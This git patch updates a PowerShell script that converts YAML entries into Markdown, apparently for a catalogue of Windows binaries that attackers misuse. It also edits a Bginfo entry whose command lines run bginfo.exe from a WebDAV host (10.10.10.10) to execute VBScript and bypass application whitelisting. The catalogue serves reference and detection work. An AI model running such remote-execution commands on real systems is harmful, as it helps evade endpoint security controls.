From 7961a99173e64e1e16572a1632931f728accd5ff Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 25 Sep 2018 02:33:38 +0200 Subject: [PATCH] minor adjustments --- Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 | 234 ++++++++++++++++++-- yml/OtherMSBinaries/Bginfo.yml | 10 +- 2 files changed, 227 insertions(+), 17 deletions(-) diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 index 57fdb38..d4657fa 100644 --- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 +++ b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 @@ -29,18 +29,226 @@ function Convert-YamlToMD "name: $($YamlObject.Name)"| Add-Content $Outfile "description: $($YamlObject.Description)"| Add-Content $Outfile "functions:"| Add-Content $Outfile - - foreach($cmd in $YamlObject.Commands) + + $Exe = @() + $Down = @() + $Uplo = @() + $Enco = @() + $Deco = @() + $Copy = @() + $Cred = @() + $Comp = @() + $ADS = @() + $AWL = @() + $Reco = @() + $Dump = @() + foreach($grp in $YamlObject.Commands) { - " $($cmd.Category):"| Add-Content $Outfile - " - description: $($cmd.Description)"| Add-Content $Outfile - " code: $($cmd.Command)"| Add-Content $Outfile - " mitreid: $($cmd.MitreID)"| Add-Content $Outfile - " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile - " operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile - " privileges: $($cmd.Privileges)"| Add-Content $Outfile - " usecase: $($cmd.UseCase)"| Add-Content $Outfile + if($grp.Category -eq "Execute"){$Exe += $grp} + if($grp.Category -eq "Download"){$Down += $grp} + if($grp.Category -eq "Upload"){$Uplo += $grp} + if($grp.Category -eq "Encode"){$Enco += $grp} + if($grp.Category -eq "Decode"){$Deco += $grp} + if($grp.Category -eq "Alternate data streams"){$ADS += $grp} + if($grp.Category -eq "Copy"){$Copy += $grp} + if($grp.Category -eq "Credentials"){$Cred += $grp} + if($grp.Category -eq "Compile"){$Comp += $grp} + if($grp.Category -eq "AWL bypass"){$AWL += $grp} + if($grp.Category -eq "Reconnaissance"){$Reco += $grp} + if($grp.Category -eq "Dump"){$Dump += $grp} } + + if($Exe) + { + " $($Exe[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Exe) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Down) + { + " $($Down[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Down) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Uplo) + { + " $($Uplo[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Uplo) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Enco) + { + " $($Enco[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Enco) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Deco) + { + " $($Deco[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Deco) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Copy) + { + " $($Copy[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Copy) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Cred) + { + " $($Cred[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Cred) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Comp) + { + " $($Comp[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Comp) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($ADS) + { + " $($ADS[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $ADS) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($AWL) + { + " $($AWL[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $AWL) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Reco) + { + " $($Reco[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Reco) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + if($Dump) + { + " $($Dump[0].Category.ToLower()):"| Add-Content $Outfile + foreach($Ex in $Dump) + { + " - description: $($Ex.Description)"| Add-Content $Outfile + " code: $($Ex.Command)"| Add-Content $Outfile + " mitreid: $($Ex.MitreID)"| Add-Content $Outfile + " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile + " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile + " privileges: $($Ex.Privileges)"| Add-Content $Outfile + " usecase: $($Ex.UseCase)"| Add-Content $Outfile + } + } + + #$Groups = $YamlObject.Commands | Group-Object {$_.Category} + #" $($grp.Name):"| Add-Content $Outfile + #" - description: $($cmd.Description)"| Add-Content $Outfile + #" code: $($cmd.Command)"| Add-Content $Outfile + #" mitreid: $($cmd.MitreID)"| Add-Content $Outfile + #" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile + #" operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile + #" privileges: $($cmd.Privileges)"| Add-Content $Outfile + #" usecase: $($cmd.UseCase)"| Add-Content $Outfile + + + #foreach($cmd in $YamlObject.Commands) + #{ + #" $($cmd.Category):"| Add-Content $Outfile + # " - description: $($cmd.Description)"| Add-Content $Outfile + # " code: $($cmd.Command)"| Add-Content $Outfile + # " mitreid: $($cmd.MitreID)"| Add-Content $Outfile + # " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile + # " operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile + # " privileges: $($cmd.Privileges)"| Add-Content $Outfile + # " usecase: $($cmd.UseCase)"| Add-Content $Outfile + #} "resources:"| Add-Content $Outfile foreach($link in $YamlObject.Resources) { @@ -124,10 +332,10 @@ function Invoke-GenerateMD #Generate the stuff! #Bins Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose -#Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose +Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose ##Scripts -#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose +Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose ##Libs -#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose \ No newline at end of file +Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose \ No newline at end of file diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index fe71d60..41a53f3 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows - - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' + - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: AWL Bypass @@ -20,7 +20,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows - - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt' + - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: AWL Bypass @@ -30,8 +30,10 @@ Commands: OperatingSystem: Windows Full Path: - No fixed path -Code Sample: [] -Detection: [] +Code Sample: + - Code: +Detection: + - IOC: Resources: - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ Acknowledgement: